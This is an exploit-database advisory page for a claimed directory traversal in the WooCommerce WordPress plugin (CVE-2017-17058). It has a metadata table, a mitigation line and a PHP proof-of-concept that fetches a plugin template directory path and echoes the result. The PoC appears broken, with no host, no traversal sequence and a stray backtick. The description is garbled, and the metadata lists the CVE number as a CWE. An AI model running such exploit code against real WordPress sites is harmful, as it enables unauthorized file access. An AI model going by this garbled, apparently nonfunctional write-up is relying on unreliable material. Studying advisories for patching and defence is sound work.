WordPress woocommerce directory traversal

vendor:

WordPress

by:

fu2x2000

7,5

CVSS

HIGH

Directory Traversal

CWE

Product Name: WordPress

Affected Version From: WordPress 4.8.3

Affected Version To: woocommerce 2.0/3.0

Patch Exists: YES

Related CWE: 2017-17058

CPE: a:wordpress:wordpress

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Webapps

2017

WordPress woocommerce directory traversal

Identifying woo commerce theme pluging properly sanitized against Directory Traversal,even the latest version of WordPress with woocommerce can be vulnerable.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a filesystem operation.

Source

Exploit-DB raw data:

# Exploit Title: WordPress woocommerce  directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps


1. Description

Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.

2. Proof of Concept

$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
    $opts = array(
        'http' => array(
            'method'=>"GET",
            'header'=>"Content-Type: text/html; charset=utf-8"
        )
    );

    $wp = stream_context_create($opts);
    $result = @file_get_contents($fn,false,$wp);
    return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;


Regards

Fu2x200